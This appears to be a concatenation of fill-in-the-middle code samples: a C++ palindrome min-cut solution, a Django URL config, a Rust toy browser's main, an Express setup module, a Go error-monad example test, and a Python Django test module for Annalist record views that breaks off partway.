<|file_name|>main1.cpp<|end_file_name|><|fim▁begin|>class Solution { public: int minCut(string s) { if (s.size() < 2) { return 0; } int len = s.size(); vector<int> cut(len + 1, 0); // cut[i] : s[0..i-1] min cut for (int i = 0; i <= len; i++) { cut[i] = i - 1; } for (int i = 0; i < len; i++) { // odd len for (int l = 0; i - l >= 0 && i + l < len && s[i - l] == s[i + l]; l++) { cut[i + l + 1] = min(cut[i + l + 1], cut[i - l - 1 + 1] + 1); } // even // i,i+1 for (int l = 0; i - l >= 0 && i + 1 + l < len && s[i - l] == s[i + 1 + l]; l++) { cut[i + 1 + l + 1] = min(cut[i + 1 + l + 1], cut[i - l - 1 + 1] + 1); } } <|fim▁hole|><|fim▁end|>
return cut[len]; } };
<|file_name|>urls.py<|end_file_name|><|fim▁begin|>from django.conf.urls import url, patterns from data import views <|fim▁hole|>urlpatterns = patterns("data.views", url(r"^$", views.IndexView.as_view()), url(r"^a/(?P<application_external_id>[^/]{,255})\.json$", views.ApplicationInstanceListView.as_view()), url(r"^(?P<model_external_id>[^/]{,255})\.json$", views.InstanceListView.as_view()), url(r"^(?P<model_external_id>[^/]{,255})/(?P<instance_external_id>[^/]{,255})\.json", views.InstanceDetailView.as_view()), )<|fim▁end|>
<|file_name|>main.rs<|end_file_name|><|fim▁begin|>extern crate getopts; extern crate image; use getopts::{optopt,getopts}; use std::default::Default; use std::io::fs::File; use std::os::args; mod css; mod dom; mod html; mod layout; mod style; mod painting; #[allow(unstable)] fn main() { // Parse command-line options: let opts = [ optopt("h", "html", "HTML document", "FILENAME"), optopt("c", "css", "CSS stylesheet", "FILENAME"), optopt("o", "output", "Output file", "FILENAME"), ]; let matches = match getopts(args().tail(), &opts) { Ok(m) => m, Err(f) => panic!(f.to_string()) }; // Read input files: let read_source = |&: arg_filename: Option<String>, default_filename: &str| { let path = match arg_filename { Some(ref filename) => &**filename, None => default_filename, }; File::open(&Path::new(path)).read_to_string().unwrap() }; let html = read_source(matches.opt_str("h"), "examples/test.html"); let css = read_source(matches.opt_str("c"), "examples/test.css"); // Since we don't have an actual window, hard-code the "viewport" size. let initial_containing_block = layout::Dimensions { content: layout::Rect { x: 0.0, y: 0.0, width: 800.0, height: 600.0 }, padding: Default::default(), border: Default::default(), margin: Default::default(), }; // Parsing and rendering: let root_node = html::parse(html); let stylesheet = css::parse(css); let style_root = style::style_tree(&root_node, &stylesheet); let layout_root = layout::layout_tree(&style_root, initial_containing_block); let canvas = painting::paint(&layout_root, initial_containing_block.content); // Create the output file: let filename = matches.opt_str("o").unwrap_or("output.png".to_string()); let file = File::create(&Path::new(&*filename)).unwrap(); <|fim▁hole|> let (w, h) = (canvas.width as u32, canvas.height as u32); let buffer: Vec<image::Rgba<u8>> = unsafe { std::mem::transmute(canvas.pixels) }; let img = image::ImageBuffer::from_fn(w, h, Box::new(|&: x: u32, y: u32| buffer[(y * w + x) as usize])); let result = image::ImageRgba8(img).save(file, image::PNG); match result { Ok(_) => println!("Saved output as {}", filename), Err(_) => println!("Error saving output as {}", filename) } // Debug output: // println!("{}", layout_root.dimensions); // println!("{}", display_list); }<|fim▁end|>
// Save an image:
<|file_name|>express-cfg.js<|end_file_name|><|fim▁begin|>// ============================================================================= // Module to configure an ExpressJS web server<|fim▁hole|> // Requires // { // "express": "4.13.3", // "cookie-parser": "1.4.0", // "morgan": "1.6.1", // "body-parser" : "1.14.1", // "express-session" : "1.12.1", // "method-override" : "2.3.5" // } var express = require('express'); var cookieParser = require('cookie-parser'); var methodOverride = require('method-override'); var http = require('http'); var bodyParser = require('body-parser'); var morgan = require('morgan'); var app = express(); app.use(morgan('dev')); // log every request to the console app.use(cookieParser()); // read cookies (needed for auth) app.use(bodyParser.json()); app.use(bodyParser.urlencoded({ extended: true })); module.exports = { app : app }<|fim▁end|>
// =============================================================================
<|file_name|>bind_test.go<|end_file_name|><|fim▁begin|>// Copyright (c) 2015, Jean Niklas L'orange // All rights reserved. // // Redistribution and use in source and binary forms, with or without // modification, are permitted provided that the following conditions are met: // // 1. Redistributions of source code must retain the above copyright notice, // this list of conditions and the following disclaimer. // // 2. Redistributions in binary form must reproduce the above copyright notice, // this list of conditions and the following disclaimer in the documentation // and/or other materials provided with the distribution. // // 3. Neither the name of the copyright holder nor the names of its contributors // may be used to endorse or promote products derived from this software without // specific prior written permission. // // THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" // AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE // IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE // ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE // LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR // CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF // SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS // INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN // CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) // ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE // POSSIBILITY OF SUCH DAMAGE. package errmonad_test import ( "encoding/json" "fmt" monad "gopkg.in/hyPiRion/go-errmonad.v1" ) const MaxBananaCount = 90 // Max amount of bananas in a box type BananaBox struct { Type string Bananas int } // Double takes a banana crate and returns a new banana crate where the amount // of bananas in it is doubled. If the new banana count will be larger than the // maximum banana count, this method will error. func (bc BananaBox) Double() (BananaBox, error) { return bc.AddBananas(bc.Bananas) } <|fim▁hole|>// AddBananas add n bananas to a banana box. If the new banana count will be // larger than the maximum banana count a single crate can contain, this method // will error. func (bc BananaBox) AddBananas(n int) (BananaBox, error) { if n+bc.Bananas > MaxBananaCount { return BananaBox{}, fmt.Errorf("Tried to add %d bananas to a box with %d bananas already inside it, will go over the limit", n, bc.Bananas) } bc.Bananas += n return bc, nil } func jsonBananaBox(bs []byte) (bb BananaBox, err error) { err = json.Unmarshal(bs, &bb) return } var doubleBananaBox = monad.Bind( jsonBananaBox, (BananaBox).Double, json.Marshal, ).(func([]byte) ([]byte, error)) var quadrupleBananaBox = monad.Bind( jsonBananaBox, (BananaBox).Double, (BananaBox).Double, json.Marshal, ).(func([]byte) ([]byte, error)) func Example() { examples := []string{ `[]`, `{"Bananas": "0"}`, `{"Type": "Dwarf Cavendish", "Bananas": 41}`, `{"Type": "Grand Nain", "Bananas": 16}`, } conversions := []func([]byte) ([]byte, error){ doubleBananaBox, quadrupleBananaBox, } for _, example := range examples { for _, convert := range conversions { bs, err := convert([]byte(example)) if err != nil { fmt.Println(err) } else { fmt.Println(string(bs)) } } } // Output: // json: cannot unmarshal array into Go value of type errmonad_test.BananaBox // json: cannot unmarshal array into Go value of type errmonad_test.BananaBox // json: cannot unmarshal string into Go value of type int // json: cannot unmarshal string into Go value of type int // {"Type":"Dwarf Cavendish","Bananas":82} // Tried to add 82 bananas to a box with 82 bananas already inside it, will go over the limit // {"Type":"Grand Nain","Bananas":32} // {"Type":"Grand Nain","Bananas":64} }<|fim▁end|>
<|file_name|>test_recordview.py<|end_file_name|><|fim▁begin|>from __future__ import unicode_literals from __future__ import absolute_import, division, print_function """ Tests for RecordView module and view Note: this module tests for rendering specifically for RecordView values, using view description sitedata files, and as such duplicates some tests covered by module test_entitygenericedit. """ __author__ = "Graham Klyne ([email protected])" __copyright__ = "Copyright 2014, G. Klyne" __license__ = "MIT (http://opensource.org/licenses/MIT)" import os import json import unittest import logging log = logging.getLogger(__name__) from django.conf import settings from django.db import models from django.http import QueryDict from django.contrib.auth.models import User from django.test import TestCase # cf. https://docs.djangoproject.com/en/dev/topics/testing/tools/#assertions from django.test.client import Client from annalist.identifiers import RDF, RDFS, ANNAL from annalist import layout from annalist import message from annalist.models.site import Site from annalist.models.sitedata import SiteData from annalist.models.collection import Collection from annalist.models.recordview import RecordView from annalist.models.recordfield import RecordField from annalist.views.uri_builder import uri_with_params from annalist.views.recordviewdelete import RecordViewDeleteConfirmedView from annalist.views.form_utils.fieldchoice import FieldChoice from .AnnalistTestCase import AnnalistTestCase from .tests import ( TestHost, TestHostUri, TestBasePath, TestBaseUri, TestBaseDir ) from .init_tests import ( init_annalist_test_site, init_annalist_test_coll, install_annalist_named_coll, create_test_coll_inheriting, init_annalist_named_test_coll, resetSitedata ) from .entity_testutils import ( make_message, make_quoted_message, site_dir, collection_dir, site_view_url, collection_edit_url, collection_entity_view_url, collection_create_values, render_select_options, create_test_user, context_field_map, context_view_field, context_bind_fields, check_context_field, check_context_field_value, ) from .entity_testviewdata import ( recordview_dir, recordview_coll_url, recordview_url, recordview_edit_url, recordview_value_keys, recordview_load_keys, recordview_create_values, recordview_values, recordview_read_values, view_view_context_data, default_view_fields_list, view_view_fields_list, view_view_form_data, recordview_delete_confirm_form_data ) from .entity_testentitydata import ( entity_url, entitydata_edit_url, entitydata_list_type_url, default_fields, default_label, default_comment, error_label, layout_classes ) from .entity_testsitedata import ( make_field_choices, no_selection, get_site_default_entity_fields_sorted, get_site_bibentry_fields_sorted ) # ----------------------------------------------------------------------------- # # RecordView tests # # ----------------------------------------------------------------------------- class RecordViewTest(AnnalistTestCase): def setUp(self): init_annalist_test_site() self.testsite = Site(TestBaseUri, TestBaseDir) self.sitedata = SiteData(self.testsite) self.testcoll = Collection(self.testsite, "testcoll") self.layout = ( { 'enum_field_placement_id': layout.ENUM_FIELD_PLACEMENT_ID , 'enum_list_type_id': layout.ENUM_LIST_TYPE_ID , 'enum_render_type_id': layout.ENUM_RENDER_TYPE_ID , 'enum_value_type_id': layout.ENUM_VALUE_TYPE_ID , 'enum_value_mode_id': layout.ENUM_VALUE_MODE_ID , 'field_typeid': layout.FIELD_TYPEID , 'group_typeid': layout.GROUP_TYPEID , 'list_typeid': layout.LIST_TYPEID , 'type_typeid': layout.TYPE_TYPEID , 'user_typeid': layout.USER_TYPEID , 'view_typeid': layout.VIEW_TYPEID , 'vocab_typeid': layout.VOCAB_TYPEID , 'field_dir': layout.FIELD_DIR , 'group_dir': layout.GROUP_DIR , 'list_dir': layout.LIST_DIR , 'type_dir': layout.TYPE_DIR , 'user_dir': layout.USER_DIR , 'view_dir': layout.VIEW_DIR , 'vocab_dir': layout.VOCAB_DIR }) return def tearDown(self): return @classmethod def setUpClass(cls): super(RecordViewTest, cls).setUpClass() return @classmethod def tearDownClass(cls): super(RecordViewTest, cls).tearDownClass() resetSitedata(scope="collections") return def test_RecordViewTest(self): self.assertEqual(Collection.__name__, "Collection", "Check Collection class name") return def test_recordview_init(self): t = RecordView(self.testcoll, "testview") u = recordview_coll_url(self.testsite, coll_id="testcoll", view_id="testview") self.assertEqual(t._entitytype, ANNAL.CURIE.View) self.assertEqual(t._entityfile, layout.VIEW_META_FILE) self.assertEqual(t._entityref, layout.COLL_BASE_VIEW_REF%{'id': "testview"}) self.assertEqual(t._entityid, "testview") self.assertEqual(t._entityurl, u) self.assertEqual(t._entitydir, recordview_dir(view_id="testview")) self.assertEqual(t._values, None) return def test_recordview1_data(self): t = RecordView(self.testcoll, "view1") self.assertEqual(t.get_id(), "view1") self.assertEqual(t.get_type_id(), layout.VIEW_TYPEID) self.assertIn( "/c/testcoll/d/%(view_dir)s/view1/"%self.layout, t.get_url() ) self.assertEqual( TestBaseUri + "/c/testcoll/d/%(view_typeid)s/view1/"%self.layout, t.get_view_url() ) t.set_values(recordview_create_values(view_id="view1")) td = t.get_values() self.assertEqual(set(td.keys()), set(recordview_value_keys())) v = recordview_values(view_id="view1") self.assertDictionaryMatch(td, v) return def test_recordview2_data(self): t = RecordView(self.testcoll, "view2") self.assertEqual(t.get_id(), "view2") self.assertEqual(t.get_type_id(), layout.VIEW_TYPEID) self.assertIn( "/c/testcoll/d/%(view_dir)s/view2/"%self.layout, t.get_url() ) self.assertEqual( TestBaseUri + "/c/testcoll/d/%(view_typeid)s/view2/"%self.layout, t.get_view_url() ) t.set_values(recordview_create_values(view_id="view2")) td = t.get_values() self.assertEqual(set(td.keys()), set(recordview_value_keys())) v = recordview_values(view_id="view2") self.assertDictionaryMatch(td, v) return def test_recordview_create_load(self): t = RecordView.create(self.testcoll, "view1", recordview_create_values(view_id="view1")) td = RecordView.load(self.testcoll, "view1").get_values() v = recordview_read_values(view_id="view1") self.assertKeysMatch(td, v) self.assertDictionaryMatch(td, v) return def test_recordview_default_data(self): t = RecordView.load(self.testcoll, "Default_view", altscope="all") self.assertEqual(t.get_id(), "Default_view") self.assertIn( "/c/_annalist_site/d/%(view_dir)s/Default_view"%self.layout, t.get_url() ) self.assertIn( "/c/testcoll/d/%(view_typeid)s/Default_view"%self.layout, t.get_view_url() ) self.assertEqual(t.get_type_id(), layout.VIEW_TYPEID) td = t.get_values() self.assertEqual( set(td.keys()), set(recordview_load_keys(view_uri=True, view_entity_type=True)) ) v = recordview_read_values(view_id="Default_view") v.update( { 'rdfs:label': 'Default record view' , 'annal:uri': 'annal:display/Default_view' }) v.pop('rdfs:comment', None) v.pop('annal:view_entity_type', None) self.assertDictionaryMatch(td, v) # actual, expect return # ----------------------------------------------------------------------------- # # RecordView edit view tests # # ----------------------------------------------------------------------------- class RecordViewEditViewTest(AnnalistTestCase): """ Tests for record view edit views """ def setUp(self): init_annalist_test_site() self.testsite = Site(TestBaseUri, TestBaseDir) self.testcoll = Collection.create(self.testsite, "testcoll", collection_create_values("testcoll")) self.no_options = [ FieldChoice('', label="(no options)") ] def special_field(fid): return ( fid == "Entity_see_also" or fid.startswith("Field_") or fid.startswith("List_") or fid.startswith("Type_") or fid.startswith("View_") or fid.startswith("User_") or fid.startswith("Coll_") or fid.startswith("Vocab_") or fid.startswith("Enum_") or fid.startswith("Group_") or False ) self.field_options = sorted( [ fid for fid in self.testcoll.child_entity_ids(RecordField, altscope="all") if fid != layout.INITIAL_VALUES_ID ]) self.field_options_no_bibentry = sorted( [ fid for fid in self.testcoll.child_entity_ids(RecordField, altscope="all") if fid != layout.INITIAL_VALUES_ID and not fid.startswith("Bib_") ]) self.field_options_bib_no_special = sorted( [ fid for fid in self.testcoll.child_entity_ids(RecordField, altscope="all") if fid != layout.INITIAL_VALUES_ID and not special_field(fid) ]) self.field_options_no_special = sorted( [ fid for fid in self.testcoll.child_entity_ids(RecordField, altscope="all") if fid != layout.INITIAL_VALUES_ID and not ((fid.startswith("Bib_") or special_field(fid))) ]) # log.info(self.field_options_no_bibentry) # For checking Location: header values... self.continuation_path = entitydata_list_type_url( coll_id="testcoll", type_id=layout.VIEW_TYPEID ) self.continuation_url = self.continuation_path create_test_user(self.testcoll, "testuser", "testpassword") self.client = Client(HTTP_HOST=TestHost) loggedin = self.client.login(username="testuser", password="testpassword") self.assertTrue(loggedin) return def tearDown(self): resetSitedata(scope="collections") return @classmethod def setUpClass(cls): super(RecordViewEditViewTest, cls).setUpClass() return @classmethod def tearDownClass(cls): super(RecordViewEditViewTest, cls).tearDownClass() resetSitedata() return # ----------------------------------------------------------------------------- # Helpers # ----------------------------------------------------------------------------- def _create_record_view( self, view_id, view_entity_type="annal:View", extra_field=None, extra_field_uri=None ): "Helper function creates record view entry with supplied view_id" t = RecordView.create( self.testcoll, view_id, recordview_create_values( view_id=view_id, view_entity_type=view_entity_type, extra_field=extra_field, extra_field_uri=extra_field_uri ) ) return t def _check_recordview_values( self, view_id, view_uri=None, view_entity_type="annal:View", update="RecordView", num_fields=4, field3_placement="small:0,12", extra_field=None, extra_field_uri=None, update_dict=None, ): "Helper function checks content of record view entry with supplied view_id" self.assertTrue(RecordView.exists(self.testcoll, view_id)) t = RecordView.load(self.testcoll, view_id) self.assertEqual(t.get_id(), view_id) self.assertEqual(t.get_view_url(), TestHostUri + recordview_url("testcoll", view_id)) v = recordview_values( view_id=view_id, view_uri=view_uri, update=update, view_entity_type=view_entity_type, num_fields=num_fields, field3_placement=field3_placement, extra_field=extra_field, extra_field_uri=extra_field_uri ) if update_dict: v.update(update_dict) for k in update_dict: if update_dict[k] is None: v.pop(k, None) # log.info("*** actual: %r"%(t.get_values(),)) # log.info("*** expect: %r"%(v,)) self.assertDictionaryMatch(t.get_values(), v) return t # Check context values common to all view fields #@@TODO: remove when references below replaced # see: _check_view_view_context_fields def _check_common_view_context_fields(self, response, action="", view_id="(?view_id)", orig_view_id=None, view_label="(?view_label)", view_entity_type="(?view_entity_type)", view_edit_view=True ): self.assertEqual(response.context['entity_id'], view_id) self.assertEqual(response.context['orig_id'], orig_view_id) self.assertEqual(response.context['type_id'], '_view') self.assertEqual(response.context['orig_type'], '_view') self.assertEqual(response.context['coll_id'], 'testcoll') self.assertEqual(response.context['action'], action) self.assertEqual(response.context['view_id'], 'View_view') # Fields # # NOTE: context['fields'][i]['field_id'] comes from FieldDescription instance via # bound_field, so type prefix is stripped. This does not apply to the field # ids actually coming from the view form. # self.assertEqual(len(response.context['fields']), 6) f0 = context_view_field(response.context, 0, 0) f1 = context_view_field(response.context, 1, 0) f2 = context_view_field(response.context, 2, 0) f3 = context_view_field(response.context, 3, 0) f4 = context_view_field(response.context, 4, 0) # 1st field - Id check_context_field(self, f0, field_id= "View_id", field_name= "entity_id", field_label= "View Id", field_placeholder= "(view id)", field_property_uri= "annal:id", field_render_type= "EntityId", field_value_mode= "Value_direct", field_value_type= "annal:EntityRef", field_placement= "small-12 medium-6 columns", field_value= view_id, options= self.no_options ) # 2nd field - Label check_context_field(self, f1, field_id= "View_label", field_name= "View_label", field_label= "Label", field_placeholder= "(view label)", field_property_uri= "rdfs:label", field_render_type= "Text", field_value_mode= "Value_direct", field_value_type= "annal:Text", field_placement= "small-12 columns", field_value= view_label, options= self.no_options ) # 3rd field - comment check_context_field(self, f2, field_id= "View_comment", field_name= "View_comment", field_label= "Help", field_property_uri= "rdfs:comment", field_render_type= "Markdown", field_value_mode= "Value_direct", field_value_type= "annal:Richtext", field_placement= "small-12 columns", options= self.no_options ) # 4th field - type of entity for view check_context_field(self, f3, field_id= "View_entity_type", field_name= "View_entity_type", field_property_uri= "annal:view_entity_type", field_render_type= "Identifier", field_value_mode= "Value_direct", field_value_type= "annal:Identifier", field_value= view_entity_type, options= self.no_options ) # 5th field - editable view option check_context_field(self, f4, field_id= "View_edit_view", field_name= "View_edit_view", field_property_uri= "annal:open_view", field_render_type= "CheckBox", field_value_mode= "Value_direct", field_value_type= "annal:Boolean", field_value= view_edit_view, options= self.no_options ) return # Check context values for view using default record view def _check_default_view_context_fields(self, response, action="", view_id="(?view_id)", orig_view_id=None, view_uri=None, view_label="(?view_label)", view_descr=None, view_entity_type="(?view_entity_type)", view_edit_view=True, view_fields=None, field_choices=None, add_field=None, remove_field=None, move_up=None, move_down=None, update="RecordView", continuation_url=None ): expect_context = view_view_context_data( coll_id="testcoll", view_id=view_id, orig_id=orig_view_id, action=action, view_uri=view_uri, view_label=view_label, view_descr=view_descr, view_entity_type=view_entity_type, view_edit_view=view_edit_view, view_fields=view_fields, field_choices=field_choices, add_field=add_field, remove_field=remove_field, move_up=move_up, move_down=move_down, update=update, continuation_url=continuation_url ) actual_context = context_bind_fields(response.context) self.assertEqual(len(response.context['fields']), 6) self.assertDictionaryMatch(actual_context, expect_context) return # The View_view test case checks descriptions of repeat-field-groups that are not # covererd by the Default_view case. def _check_view_view_context_fields(self, response, action="", num_fields=6): # Common fields self._check_common_view_context_fields(response, action=action, view_id="View_view", orig_view_id="View_view", view_label="View definition", view_entity_type="annal:View", view_edit_view=False ) # 6th field - field list f5 = context_view_field(response.context, 5, 0) expect_field_data = ( [ { 'annal:field_placement': 'small:0,12;medium:0,6' , 'annal:field_id': layout.FIELD_TYPEID+'/View_id' } , { 'annal:field_placement': 'small:0,12' , 'annal:field_id': layout.FIELD_TYPEID+'/View_label' } , { 'annal:field_placement': 'small:0,12' , 'annal:field_id': layout.FIELD_TYPEID+'/View_comment' } , { 'annal:field_placement': 'small:0,12' , 'annal:field_id': layout.FIELD_TYPEID+'/View_entity_type' } , { 'annal:field_placement': 'small:0,12;medium:0,6' , 'annal:field_id': layout.FIELD_TYPEID+'/View_edit_view' } , { 'annal:field_placement': 'small:0,12' , 'annal:field_id': layout.FIELD_TYPEID+'/View_fields' } ]) if num_fields == 7: # New blank field, if selected expect_field_data.append( { 'annal:property_uri': None , 'annal:field_placement': None , 'annal:field_id': None }) # log.info(repr(r.context['fields'][5]['field_value'])) check_context_field(self, f5, field_id= "View_fields", field_name= "View_fields", field_label= "Fields", field_property_uri= "annal:view_fields", field_render_type= "Group_Seq_Row", field_value_mode= "Value_direct", field_value_type= "annal:View_field", field_value= expect_field_data, options= self.no_options ) return # ----------------------------------------------------------------------------- # Form rendering tests # ----------------------------------------------------------------------------- def test_get_form_rendering(self): u = entitydata_edit_url("new", "testcoll", layout.VIEW_TYPEID, view_id="View_view") r = self.client.get(u+"?continuation_url=/xyzzy/") self.assertEqual(r.status_code, 200) self.assertEqual(r.reason_phrase, "OK") field_vals = default_fields( coll_id="testcoll", type_id=layout.VIEW_TYPEID, entity_id="00000001", tooltip1=context_view_field(r.context, 0, 0)['field_tooltip'], tooltip2=context_view_field(r.context, 1, 0)['field_tooltip'], tooltip3=context_view_field(r.context, 2, 0)['field_tooltip'], tooltip4=context_view_field(r.context, 3, 0)['field_tooltip'], tooltip5=context_view_field(r.context, 4, 0)['field_tooltip'], tooltip6f1=context_view_field(r.context, 5, 0). _field_description['group_field_descs'][0]['field_tooltip_test'] ) formrow1 = """ <div class="small-12 medium-6 columns" title="%(tooltip1)s"> <div class="row view-value-row"> <div class="%(label_classes)s"> <span>View Id</span> </div> <div class="%(input_classes)s"> <input type="text" size="64" name="entity_id" placeholder="(view id)" value="%(entity_id)s"/> </div> </div> </div> """%field_vals(width=6) formrow2 = """ <div class="small-12 columns" title="%(tooltip2)s"> <div class="row view-value-row"> <div class="%(label_classes)s"> <span>Label</span> </div> <div class="%(input_classes)s"> <input type="text" size="64" name="View_label" placeholder="(view label)" value="%(default_label_esc)s"/> </div> </div> </div> """%field_vals(width=12) formrow3 = """ <div class="small-12 columns" title="%(tooltip3)s"> <div class="row view-value-row"> <div class="%(label_classes)s"> <span>Help</span> </div> <div class="%(input_classes)s"> <textarea cols="64" rows="6" name="View_comment" class="small-rows-4 medium-rows-8" placeholder="(description of record view)"> %(default_comment_esc)s </textarea> </div> </div> </div> """%field_vals(width=12) formrow4 = """ <div class="small-12 columns" title="%(tooltip4)s"> <div class="row view-value-row"> <div class="%(label_classes)s"> <span>View entity type</span> </div> <div class="%(input_classes)s"> <input type="text" size="64" name="View_entity_type" placeholder="(Entity type URI/CURIE displayed by view)" value=""/> </div> </div> </div> """%field_vals(width=12) formrow5 = """ <div class="small-12 medium-6 columns" title="%(tooltip5)s"> <div class="row view-value-row"> <div class="%(label_classes)s"> <span>Editable view?</span> </div> <div class="%(input_classes)s"> <input type="checkbox" name="View_edit_view" value="Yes" checked="checked" /> <span class="value-placeholder">(edit view from edit entity form)</span> </div> </div> </div> """%field_vals(width=6) formrow6 = """ <div class="small-1 columns checkbox-in-edit-padding"> <input type="checkbox" class="select-box right" name="View_fields__select_fields" value="0" /> </div> """ formrow6f1 = (""" <div class="small-12 medium-4 columns" title="%(tooltip6f1)s"> <div class="row show-for-small-only"> <div class="view-label small-12 columns"> <span>Field ref</span> </div> </div> <div class="row view-value-col"> <div class="view-value small-12 columns"> """+ render_select_options( "View_fields__0__View_field_sel", "Field ref", no_selection("(field ref)") + get_site_default_entity_fields_sorted(), layout.FIELD_TYPEID+"/Entity_id", placeholder="(field reference)" )+ """ </div> </div> </div> """)%field_vals(width=4) # log.info("*** View content: "+r.content) self.assertContains(r, formrow1, html=True) self.assertContains(r, formrow2, html=True) self.assertContains(r, formrow3, html=True) self.assertContains(r, formrow4, html=True) self.assertContains(r, formrow5, html=True) self.assertContains(r, formrow6, html=True) self.assertContains(r, formrow6f1, html=True) return def test_get_new(self): u = entitydata_edit_url("new", "testcoll", layout.VIEW_TYPEID, view_id="View_view") r = self.client.get(u+"?continuation_url=/xyzzy/") self.assertEqual(r.status_code, 200) self.assertEqual(r.reason_phrase, "OK") # Test context # view_url = collection_entity_view_url( # coll_id="testcoll", type_id=layout.VIEW_TYPEID, entity_id="00000001" # ) self.assertEqual(r.context['coll_id'], "testcoll") self.assertEqual(r.context['type_id'], layout.VIEW_TYPEID) self.assertEqual(r.context['entity_id'], "00000001") self.assertEqual(r.context['orig_id'], None) self.assertEqual(r.context['entity_uri'], None) self.assertEqual(r.context['action'], "new") self.assertEqual(r.context['edit_view_button'], False) self.assertEqual(r.context['continuation_url'], "/xyzzy/") # Fields initially created self._check_default_view_context_fields(r, action="new", view_id="00000001", orig_view_id=None, view_label="", # default_label("testcoll", layout.VIEW_TYPEID, "00000001"), view_entity_type="", # view_url=recordview_url("testcoll", "00000001"), field_choices=self.field_options_no_special, continuation_url="/xyzzy/" ) return def test_get_copy(self): u = entitydata_edit_url( "copy", "testcoll", layout.VIEW_TYPEID, entity_id="Default_view", view_id="View_view" ) r = self.client.get(u) self.assertEqual(r.status_code, 200) self.assertEqual(r.reason_phrase, "OK") # Test context (values read from test data fixture) # view_url = collection_entity_view_url( # coll_id="testcoll", type_id=layout.VIEW_TYPEID, entity_id="Default_view" # ) self.assertEqual(r.context['coll_id'], "testcoll") self.assertEqual(r.context['type_id'], layout.VIEW_TYPEID) self.assertEqual(r.context['entity_id'], "Default_view_01") self.assertEqual(r.context['orig_id'], "Default_view") self.assertEqual(r.context['entity_uri'], None) self.assertEqual(r.context['action'], "copy") self.assertEqual(r.context['edit_view_button'], False) self.assertEqual(r.context['continuation_url'], "") # Fields self._check_default_view_context_fields(r, action="copy", view_id="Default_view_01", orig_view_id="Default_view", view_label="Default record view", # view_url=view_url, view_uri=None, view_entity_type="", field_choices=self.field_options_no_special, continuation_url="" ) return def test_get_copy_not_exists(self): u = entitydata_edit_url( "copy", "testcoll", layout.VIEW_TYPEID, entity_id="noview", view_id="View_view" ) r = self.client.get(u) # log.info(r.content) self.check_entity_not_found_response(r, err_msg=make_message( message.ENTITY_DOES_NOT_EXIST, type_id=layout.VIEW_TYPEID, id="noview", label=error_label("testcoll", layout.VIEW_TYPEID, "noview") ) ) return def test_get_edit(self): u = entitydata_edit_url( "edit", "testcoll", layout.VIEW_TYPEID, entity_id="Default_view", view_id="View_view" ) r = self.client.get(u) self.assertEqual(r.status_code, 200) self.assertEqual(r.reason_phrase, "OK") # Test context (values read from test data fixture) # view_url = collection_entity_view_url( # coll_id="testcoll", type_id=layout.VIEW_TYPEID, entity_id="Default_view" # ) self.assertEqual(r.context['coll_id'], "testcoll") self.assertEqual(r.context['type_id'], layout.VIEW_TYPEID) self.assertEqual(r.context['entity_id'], "Default_view") self.assertEqual(r.context['orig_id'], "Default_view") self.assertEqual(r.context['entity_uri'], "annal:display/Default_view") self.assertEqual(r.context['action'], "edit") self.assertEqual(r.context['edit_view_button'], False) self.assertEqual(r.context['continuation_url'], "") # Fields self._check_default_view_context_fields(r, action="edit", view_id="Default_view", orig_view_id="Default_view", view_label="Default record view", # view_url=view_url, view_uri="annal:display/Default_view", view_entity_type="", field_choices=self.field_options_no_special, continuation_url="" ) return def test_get_edit_not_exists(self): u = entitydata_edit_url( "edit", "testcoll", layout.VIEW_TYPEID, entity_id="noview", view_id="View_view" ) r = self.client.get(u) # log.info(r.content) self.check_entity_not_found_response(r, err_msg=make_message( message.ENTITY_DOES_NOT_EXIST, type_id=layout.VIEW_TYPEID, id="noview", label=error_label("testcoll", layout.VIEW_TYPEID, "noview") ) ) return # Test rendering of view with repeated field structure - in this case, View_view def test_get_recordview_edit(self): u = entitydata_edit_url( "edit", "testcoll", layout.VIEW_TYPEID, entity_id="View_view", view_id="View_view" ) r = self.client.get(u) self.assertEqual(r.status_code, 200) self.assertEqual(r.reason_phrase, "OK") # Test context (values read from test data fixture) # view_url = collection_entity_view_url( # coll_id="testcoll", type_id=layout.VIEW_TYPEID, entity_id="View_view" # ) self.assertEqual(r.context['coll_id'], "testcoll") self.assertEqual(r.context['type_id'], layout.VIEW_TYPEID) self.assertEqual(r.context['entity_id'], "View_view") self.assertEqual(r.context['orig_id'], "View_view") self.assertEqual(r.context['entity_uri'], "annal:display/View_view") self.assertEqual(r.context['action'], "edit") self.assertEqual(r.context['continuation_url'], "") # Fields self._check_view_view_context_fields(r, action="edit") return def test_get_recordview_edit_add_field(self): u = entitydata_edit_url( "edit", "testcoll", layout.VIEW_TYPEID, entity_id="View_view", view_id="View_view" ) u = uri_with_params(u, {'add_field': 'View_fields'}) r = self.client.get(u) self.assertEqual(r.status_code, 200) self.assertEqual(r.reason_phrase, "OK") # Test context (values read from test data fixture) # view_url = collection_entity_view_url( # coll_id="testcoll", type_id=layout.VIEW_TYPEID, entity_id="View_view" # ) self.assertEqual(r.context['coll_id'], "testcoll") self.assertEqual(r.context['type_id'], layout.VIEW_TYPEID) self.assertEqual(r.context['entity_id'], "View_view") self.assertEqual(r.context['orig_id'], "View_view") self.assertEqual(r.context['entity_uri'], "annal:display/View_view") self.assertEqual(r.context['action'], "edit") self.assertEqual(r.context['continuation_url'], "") # View context self._check_view_view_context_fields(r, action="edit", num_fields=7) return # ----------------------------------------------------------------------------- # Form response tests # ----------------------------------------------------------------------------- # -------- new view -------- def test_post_new_view(self): self.assertFalse(RecordView.exists(self.testcoll, "newview")) f = view_view_form_data(view_id="newview", action="new", update="NewView") u = entitydata_edit_url("new", "testcoll", layout.VIEW_TYPEID, view_id="View_view") r = self.client.post(u, f) # print r.content 